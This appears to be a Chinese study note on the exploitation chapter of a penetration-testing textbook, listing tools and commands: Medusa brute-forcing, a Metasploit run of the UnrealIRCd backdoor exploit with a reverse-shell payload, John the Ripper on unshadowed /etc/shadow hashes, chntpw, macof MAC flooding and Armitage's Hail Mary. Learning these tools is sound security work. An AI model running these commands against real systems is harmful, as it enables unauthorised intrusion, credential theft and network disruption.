渗透测试实践-漏洞利用

本文是我阅读《渗透测试实践指南·第四章·漏洞利用》所做的笔记。

零、开始

• 漏洞利用是获得系统控制权限的过程
• 以扫描成果组织、确定并指导漏洞利用

一、利用Medusa获得远程服务的访问权限

• Medusa是一款在线密码破解工具，Kali中默认安装
• Kali自带密码字典：/usr/share/wordlists/
• 用侦查所得信息生成针对性用户名、密码字典
• 电子邮箱前缀往往是用户名
• 尝试另一款在线密码破解工具：Hydra

  medusa -h target_ip -u username -P path_to_password_dictionary -M authentication_service_to_attack
  

二、Metasploit：用Hugh Jackman的方式进行入侵

• Hugh Jackman——《剑鱼行动》主角
• 攻击荷载回答的问题是：“我已经控制了机器，接着要干嘛？”
• Metasploit是手术刀不是大板斧，是狙击枪不是机关枪
• 启动Metasploit：msfconsole
• 升级Metasploit：msfupdate
• 搜索漏洞对应攻击程序：search cve-2010-2075（ms、cve和bid等）
• 使用某一攻击程序：use exploit/unix/irc/unreal_ircd_3281_backdoor
• 显示可用攻击荷载：show payloads（会显示与已选攻击程序相匹配的所有攻击荷载）
• 设置payload：set payload cmd/unix/reverse
• 查看选项：show options
• 设置选项：set RHOST 192.168.56.251
• 核对选项：show options
• 发起攻击：exploit

三、John the Ripper：密码破解之王

• 测试硬件性能：john –test
• unshadow /etc/passwd /etc/shadow > /tmp/hash.txt
• 和hashcat差不多的东西

四、密码重置：破墙而入

• chntpw

五、Wireshark：流量嗅探

• 将网卡置为混杂模式
• 交换机环境下嗅探前可先运行Macof
• 用于中间人攻击的工具：Ettercap

六、Macof：巧妇能为无米之炊

• Macof是Dsniff工具集中的一个工具
• 失效开放（fail open）：交换机匹配不到某报文目标MAC地址对应的端口时会将该报文发送到各个端口
• 失效关闭（fail close）：某些交换机采用失效关闭策略
• 泛洪攻击：用大量伪造MAC地址填满交换机匹配表

  macof -i eth0 -s 192.168.18.130 -d 192.168.18.2
  

七、Armitage：入侵工具中的超级明星

• 图形界面化的Metasploit
• 发现主机：Hosts -> Nmap Scan -> Quick Scan(OS detect)
• 进行入侵：Attacks -> Hail Mary
• Hail Mary是机关枪式的攻击，会尝试所有可能的攻击方式

八、结束

• Metasploit官方教程：Metasploit Unleashed
• 渗透测试模拟环境：De-ICE
• 不要轻易寻求别人的帮助、不要过早放弃、不要频繁依赖提示
• 硬着头皮啃一下乍一看似乎不可能完成的难题，这一过程具有很大的价值，可以充分挖掘学习的潜力